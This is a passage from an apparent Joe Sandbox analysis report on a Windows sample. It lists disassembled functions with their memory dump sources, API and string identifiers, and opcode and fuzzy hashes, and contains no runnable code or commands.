                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction ID: ae81148a40a3e58e71dc2da579647c5ac35ce6a7802ebd3fccee1782f7d5053d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0C82170870781EA15AB10EC4933AA371FF94770F940639CA6E455E4DF2CD48CCB20
                                                                                                                                                                                                                                  Function 00007FFBA66AAC0C Relevance: 7.7, APIs: 5, Instructions: 161encryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 966150261-0
                                                                                                                                                                                                                                  • Opcode ID: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                                  • Instruction ID: 0a597dd15bde6990c3a9899c0f304d8b1e7e08966d3fac1fc6738117f477314f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81512DF1E0B65282FA576F39DE141B822B6EF64F91B14A432CD4E86791DE3CA401DB00
                                                                                                                                                                                                                                  Function 00007FFBAA4981A8 Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1671601251-0
                                                                                                                                                                                                                                  • Opcode ID: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                                  • Instruction ID: 746ca5b6013422503af9dcd8675d09551575b679644554ddc70a24be84626a4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8415FB1A0EA42C2EB664B34E8D437D73A8FF95B85F000071ED4E426A5DF2DE426C760
                                                                                                                                                                                                                                  Function 00007FF72C679368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction ID: c0fc834633b997149547d233c601b28d733ff1fad658722d3fa7980960768f62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF119632D58A0201FA567165EC9337990D3FF7C378E880E34E76E06AD58E6C9849CE20
                                                                                                                                                                                                                                  Function 00007FF72C66B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3AF
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3CE
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3F6
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B407
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B418
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                  • Instruction ID: 50677f509f3fe0502c9133559968d4331df57f5656ab6f5dd6a059a279eaf794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9116330F0864381F95AB3665E51239B163FFA47B0FE44338E97D466CADE2CA4415A21
                                                                                                                                                                                                                                  Function 00007FF72C66B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                  • Instruction ID: 91aff1a4218b12280ddb1d21c226ababfb5afb4d7add09cf78fe9f9f70166706
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C110D24A0C20785F99A72614D51179B2A7FFA5330FA4473CE97E456C2DE2DB4815A31
                                                                                                                                                                                                                                  Function 00007FFBA6819750 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • 00007FFBBB593010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFBA6819F87,?,00000007,?), ref: 00007FFBA6819917
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                  • API String ID: 2201947777-2903559916
                                                                                                                                                                                                                                  • Opcode ID: f02188dde1f8f14deee468423fab8d44e2239df53a6eea34a2b0af57ff28faf2
                                                                                                                                                                                                                                  • Instruction ID: 7e145d5e000f09ff6b7166d43e7801cc0ba390ea44c02086f0ed5d9af1479cf5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f02188dde1f8f14deee468423fab8d44e2239df53a6eea34a2b0af57ff28faf2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08B1BBE2E1A68286EE669B25D4103B967AAEF41F94F4941B7CE5D073D5DF3CE805C300
                                                                                                                                                                                                                                  Function 00007FF72C665FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                  • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction ID: 4d3c2c19871df30d0da8be690ca060c8999831cb4cf82644c868f4712a798c62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0591F532A0CA4641E722AE29EC5037DF6B6FB60B64FE44139DA5D433C5DE3DE4458B20
                                                                                                                                                                                                                                  Function 00007FF72C66FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                  • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction ID: 9168ac49bc1544466ca037400ab4dc9444bc15183802600d0e4d9c06423c100f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA819672D081429DE7667E25C910379B6F2FB31768FF54039CA0997285CF2EB9019B23
                                                                                                                                                                                                                                  Function 00007FFBA60BF070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                  • API String ID: 3568877910-2527649602
                                                                                                                                                                                                                                  • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                  • Instruction ID: f164eb6814137803d93ab1524a293e4f80d259013c2e016bacde8f3ffd43316d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7471B0E1B0AAC292EB56DB35D4913BD2653EB84F84F449035DE1D8B796DF3CE4A18300
                                                                                                                                                                                                                                  Function 00007FF72C65D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction ID: b353b5b21308d8c34528948bb3da8c03ed2b24e3718d2fcd16a3f259ff3d6573
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13519136A196028ADB16EB15D944A7DB792FB64BE8FA04130DB4D477C8DF7CE841CB10
                                                                                                                                                                                                                                  Function 00007FF72C65EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                  • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction ID: c4a12d63d9c9e1749a6b0f7ed45af4343cb6e5eddea43c0770adb01e305bf7a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2619E32908BC585EB31AF15E8403AAB7A1FB957E8F544225EB9C03B99DF7DD090CB10
                                                                                                                                                                                                                                  Function 00007FF72C65F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                  • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction ID: 48c74187229be5f65c86340b6f42d7d27ce04f4ff2c29b7c0277e5e36e681679
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A4326082428AEB65AB21D94427CB792FF64BE4FA44135DB4C43BC6CF3DE450CB56
                                                                                                                                                                                                                                  Function 00007FFBA41721E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
